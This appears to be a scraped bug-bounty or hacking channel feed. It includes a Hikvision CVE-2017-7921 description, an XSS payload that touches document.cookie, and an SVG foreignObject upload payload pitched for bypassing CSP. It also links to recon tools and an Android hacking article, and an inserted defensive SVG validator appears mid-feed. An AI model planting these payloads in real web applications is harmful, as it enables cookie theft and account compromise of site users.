🚨🕷CVE-2017-7921🕷🚨
An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.
👍4❤3🔥1👏1
SQLi and XSS on the same program
Payload: <svg onload=prompt%26%230000000040document.cookie)>
❤9🔥3👏2👍1
I wanted to create a free blogger website. You will get many things for free on this site. Now I tested what I saw. Everyone can visit: https://shadowcyber51.blogspot.com/2024/10/test.html?m=1
🔥9🥰3👍2
Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings.
Many file uploads allow SVGs and are prone to tampering.
<svg width="600" height="400" xmlns="http://www.w3.org/2000/svg" xmlns:xhtml="http://www.w3.org/1999/xhtml">
<foreignObject width="100%" height="100%">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src='javascript:confirm(10)'></iframe>
</body>
</foreignObject>
</svg>
🔥12👏3👍1
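On the upload-handling side, the SVG trick in the post above is stopped by an element allowlist rather than by stripping strings. The following is an added example, not part of the original post: the function name, the allowlist and the sample files are assumptions made for illustration.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
# Assumed allowlist for static artwork only; anything else (foreignObject,
# script, iframe, use, image, animate, ...) is refused.
ALLOWED_TAGS = {"svg", "g", "path", "rect", "circle", "ellipse", "line",
                "polyline", "polygon", "title", "desc", "defs",
                "linearGradient", "radialGradient", "stop"}

def check_svg(data: bytes) -> list:
    """Return reasons to reject an uploaded SVG; an empty list means accept."""
    # Refuse DTDs before parsing: ElementTree expands internal entities.
    if re.search(rb"<!\s*(DOCTYPE|ENTITY)", data, re.I):
        return ["DOCTYPE/ENTITY declaration"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    for el in root.iter():
        # Tags arrive as "{namespace}local"; both parts must be on the allowlist.
        ns, _, local = el.tag.rpartition("}")
        if ns.lstrip("{") != SVG_NS or local not in ALLOWED_TAGS:
            findings.append(f"element not allowed: {local}")
        for name, value in el.attrib.items():
            attr = name.rpartition("}")[2].lower()
            if attr.startswith("on"):
                findings.append(f"event handler attribute: {attr}")
            elif attr in ("href", "src") and not value.strip().startswith("#"):
                findings.append(f"external or script URL in {attr}")
    return findings

# Constructed samples: the SVG from the post and a benign file.
POST_SVG = b"""<svg width="600" height="400" xmlns="http://www.w3.org/2000/svg" xmlns:xhtml="http://www.w3.org/1999/xhtml">
<foreignObject width="100%" height="100%">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src='javascript:confirm(10)'></iframe>
</body>
</foreignObject>
</svg>"""
BENIGN_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
              b'<rect width="10" height="10" fill="red"/></svg>')

if __name__ == "__main__":
    for label, doc in (("post payload", POST_SVG), ("benign", BENIGN_SVG)):
        print(label, "->", check_svg(doc) or "accepted")
```

Serving user uploads from a separate origin, or with Content-Disposition: attachment, is the complementary control for files that pass the check.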
Those who are interested in Android phone hacking can read this article
https://shorturl.at/x8jNs
🔥7❤2👍1
Live Bug Bounty Advanced GitHub Recon | Secrets of Bug Hunters
https://youtu.be/46SZdvM-fxw?si=VVLWHqOlus8J7MKO
🔴 LIVE BUG BOUNTY: Advanced GitHub Recon | Secrets of Pro Bug Hunters
Welcome to an exclusive live bug bounty session where we dive deep into advanced GitHub recon! 🚀 Learn the top secrets of pro bug hunters as I walk you through my process to find vulnerabilities…
❤22💯2👍1
My teammate developed a Recon Engine with subdomain finding, port scanning, parameter finding, technology detection, information disclosure, git dorking, CVE search, and many more features. You guys should check out this Recon Engine. If you know of anything valid and interesting that is missing from the Recon Engine, you can suggest it to us by sending a link. DM us.
https://freelancermijan.github.io/reconengine/
👍30❤11🔥7💩5🤝4🥰3